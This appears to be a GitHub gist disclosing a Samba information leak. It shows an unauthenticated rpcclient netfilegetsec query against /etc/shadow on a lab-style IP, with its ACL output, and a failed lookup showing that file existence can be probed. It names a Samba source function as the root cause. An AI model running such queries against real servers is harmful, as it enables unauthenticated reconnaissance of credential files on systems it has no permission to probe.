Last active
September 19, 2022 18:25
-
-
Save timb-machine/9ffe6e5b52b85aa7d01c30301201bd34 to your computer and use it in GitHub Desktop.
Yo Samba, what files do you have?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ echo netfilegetsec 'IPC$' /etc/shadow | rpcclient -U '%' 10.10.10.3 | |
| revision: 1 | |
| type: 0x9004: SEC_DESC_DACL_PRESENT SEC_DESC_DACL_PROTECTED SEC_DESC_SELF_RELATIVE | |
| DACL | |
| ACL Num ACEs: 3 revision: 2 | |
| --- | |
| ACE | |
| type: ACCESS ALLOWED (0) flags: 0x00 | |
| Specific bits: 0x1ff | |
| Permissions: 0x1e01ff: SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS | |
| SID: S-1-22-1-0 | |
| ACE | |
| type: ACCESS ALLOWED (0) flags: 0x00 | |
| Specific bits: 0xa9 | |
| Permissions: 0x1200a9: SYNCHRONIZE_ACCESS READ_CONTROL_ACCESS | |
| SID: S-1-22-2-0 | |
| ACE | |
| type: ACCESS ALLOWED (0) flags: 0x00 | |
| Specific bits: 0xa9 | |
| Permissions: 0x1200a9: SYNCHRONIZE_ACCESS READ_CONTROL_ACCESS | |
| SID: S-1-1-0 | |
| Owner SID: S-1-22-1-0 | |
| Group SID: S-1-22-2-0 | |
| $ echo netfilegetsec 'IPC$' /etc/shado | rpcclient -U '%' 10.10.10.3 | |
| result was WERR_BADFILE | |
| Root cause appears to be https://github.com/samba-team/samba/blob/e742661bd2507d39dfa47e40531dc1dca636cbbe/source4/ntvfs/simple/vfs_simple.c: svfs_qpathinfo() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment